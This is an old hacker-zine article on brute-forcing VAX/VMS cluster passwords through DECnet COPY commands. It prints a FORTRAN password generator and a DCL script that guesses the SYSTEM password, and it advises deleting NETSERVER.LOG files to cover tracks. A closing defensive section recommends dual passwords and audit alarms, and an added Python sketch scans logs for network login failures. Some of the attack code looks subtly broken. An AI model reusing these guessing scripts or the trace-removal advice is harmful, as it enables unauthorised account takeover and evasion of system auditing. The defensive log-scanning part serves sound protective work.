More VAX Tricks
by Mainstream America
So you're getting tired of the VAX hanging up on you after three tries at the system password. And your Demon Dialer is about to sue you for overwork. Well, cheer up, fellow hackers. There is hope. Assuming your target system is set up as a clustered environment, there is an interesting weakness that will allow non-privileged users unlimited guesses at any account.
A number of VAX/VMS commands are designed to accept a password, username, and a node name along with the file specification. These commands include COPY, APPEND, and DELETE.
For the sake of consistency, let's use the COPY command.
In order to copy the file LOGIN.COM from a target directory into your non-privileged account renaming it GOT.IT, use the following syntax:
    $ COPY OSHKOSH"SMITH PASSWORD"::DRC5:[SMITH]LOGIN.COM []GOT.IT

This will copy SMITH's LOGIN.COM from his directory on the node named OSHKOSH to your directory. (On the same node and device. Just repeat the same syntax for your directory if your account resides elsewhere.)
Naturally this assumes that SMITH has a LOGIN.COM in his directory in the first place. That is a likely assumption, although it is certainly grounds to either use a different command or restructure this one to copy one of your files into his directory.
Now all you have to do is keep guessing at the password. Unfortunately there is one small catch (there always is). This will leave a trace. It's called: NETSERVER.LOG
This file is deposited in the target directory every time you enter this command and, yes, it has your name in it.
But there's usually more than one way to skin a VAX. Many (not all) VAX clusters are set up to purge these NETSERVER.LOG files. This means that at least there will be fewer traces. Furthermore, if you're quick enough in guessing the password before suspicions are aroused, just login to his account and delete the ruddy logfiles.
Now if the target account is not privileged (specifically, doesn't have EXQUOTA) and these files aren't purged, you'll eventually overflow his allotted disk space and won't be able to guess any more passwords until someone of authority straightens out the account.
On the other hand, if the account has privileges (which is why you're trying to guess the password in the first place), you need not worry about this.
Most people use easily-remembered passwords that you quite likely can guess just by knowing a bit more about them. On the other hand, they might use a conglomeration of two or more words or numbers. If this is the case, you'll probably want to feed the above command with a password generator.
Below is such a generator. It was quickly put together and I'm sure you hackers out there can write up a better one. It's here purely to demonstrate a technique:
    !FORTRAN PASSWORD GENERATOR
          IMPLICIT INTEGER (A-Z)
          INTEGER D(17)
          DOUBLE PRECISION COUNTER
          CHARACTER*1 A(38), C(16), B, E(23)
          DATA A/'A','B','C','D','E','F','G','H','I','J','K','L','M',
         1       'N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
         2       '$','_','0','1','2','3','4','5','6','7','8','9'/
          DATA B/' '/
          DATA E/'@','G','U','E','S','S',' ',' ',' ',' ',' ',' ',' ',' ',
         1       ' ',' ',' ',' ',' ',' ',' ',' ',' '/
          DO 1 L=1,16
          D(L)=0          !initialize each counter
    1     C(L)=B          !and blank out the outputted number array
          D(17)=0
          DIGITS=1
          TIME=1
          COUNTER=0
    50    COUNTER=COUNTER+1
          IF (COUNTER.EQ.38**TIME) THEN
            DIGITS=DIGITS+1
            TIME=TIME+1
            COUNTER=0
          END IF
          D(1)=D(1)+1
          DO 20 I=1,DIGITS
            IF (D(I).GT.38) THEN
              D(I)=1
              D(I+1)=D(I+1)+1
            END IF
    20    CONTINUE
          DO 30 J=1,DIGITS
            C(J)=A(D(J))
    30    CONTINUE
          DO 60 NN=1,DIGITS
    60    E(8+NN)=C(NN)
    300   FORMAT(30A1)
          STATUS=LIB$SPAWN(E..SYS$OUTPUT)
          GOTO 50
    200   FORMAT(X,16A1)
          END

Now here's where things get a bit sticky. Trying to execute the command from within this FORTRAN program will bomb its execution upon the first privilege violation. The way to do it, then, is to feed the password as a parameter to a DCL procedure that continues on error. Thus the second program:
    $! PASSWORD GUESSER - GUESS.COM
    $ ON ERROR THEN CONTINUE
    $ ON CONTROL_Y THEN EXIT
    $ COPY OSHKOSH"SYSTEM ''P1'"::DRC3:[OSHKOSH]LOGIN.COM []GOT.IT
    $ IF $STATUS THEN GOTO CAUGHT
    $ EXIT
    $ CAUGHT:
    $ OPEN/WRITE IN_FILE PASS.WORD
    $ WRITE IN_FILE "The password for SYSTEM is ",P1
    $ CLOSE IN_FILE
    $ DELETE PROBE.EXE;*      ! This will stop execution upon success

Now, pardon me while I remove my tongue, planted so firmly in my cheek. As you may have guessed, I'm a system person. So what's a system manager to do about such a weakness?
First off, simply having two passwords on all privileged accounts will make the above technique excruciatingly difficult. In this way, your hacker will need two password generators running simultaneously (or more practically, in the same program) and both passwords will have to be guessed simultaneously.
If this is inconvenient, impractical, or still too insecure for you, you'll want to turn the audit alarm on for network logins. Then, on a periodic basis (e.g. nightly), run a batch job that closes the operator log and searches it for such failures. From here you have your choice of responses, including parsing out the username and disusing (setting the DISUSER flag on) his account.
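As an added illustration of the nightly search step (not code from the article), here is a Python sketch that scans an operator-log extract for network login failures, tallies them by source and target account, and names the source usernames worth disusing. The sample records are constructed and their field names only approximate the layout of VMS security-alarm messages; the threshold is an assumption.

```python
import re
from collections import Counter

# Constructed sample of OPCOM security-alarm records. Field names approximate
# VMS "Network login failure" alarms and are assumptions, not a real log.
SAMPLE_OPERATOR_LOG = """\
%%%%%%%%%%%  OPCOM  12-MAR-1990 02:13:44.11  %%%%%%%%%%%
Auditable event:          Network login failure
Username:                 SYSTEM
Remote nodename:          OSHKOSH
Remote username:          JONES
%%%%%%%%%%%  OPCOM  12-MAR-1990 02:13:45.02  %%%%%%%%%%%
Auditable event:          Network login failure
Username:                 SYSTEM
Remote nodename:          OSHKOSH
Remote username:          JONES
%%%%%%%%%%%  OPCOM  12-MAR-1990 08:30:10.55  %%%%%%%%%%%
Auditable event:          Network login failure
Username:                 SMITH
Remote nodename:          OSHKOSH
Remote username:          SMITH
"""

BANNER = re.compile(r"^%{5,}\s+OPCOM\s.*$", re.M)   # one OPCOM banner per record
FIELD = re.compile(r"^\s*([A-Za-z ]+):\s+(.*?)\s*$")  # "Name:   value" lines

def parse_alarms(log_text):
    """Split the log at OPCOM banners; return one {field: value} dict per record."""
    records = []
    for chunk in BANNER.split(log_text):
        fields = {m.group(1).strip().lower(): m.group(2)
                  for m in map(FIELD.match, chunk.splitlines()) if m}
        if fields:
            records.append(fields)
    return records

def network_login_failures(log_text):
    """Tally failures by (remote node, remote username, target account)."""
    tally = Counter()
    for rec in parse_alarms(log_text):
        if "network login failure" in rec.get("auditable event", "").lower():
            tally[(rec.get("remote nodename", "?"),
                   rec.get("remote username", "?"),
                   rec.get("username", "?"))] += 1
    return tally

def accounts_to_disuser(log_text, threshold=2):
    """Remote usernames with at least `threshold` failures against one target."""
    return sorted({src for (_, src, _), n in network_login_failures(log_text).items()
                   if n >= threshold})
```

A single failure (SMITH mistyping his own password) stays below the threshold, while repeated failures from one source against one account are what the batch job should report.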
Clusters allow a great deal more resources for the money. Unfortunately, as your access rate climbs so does your intrusion attempt rate. It's interesting that communication security has lagged system security disproportionately.
Personally, I think it's a plot by the 2600s. Keep it up, fellows!
Code: GUESS.F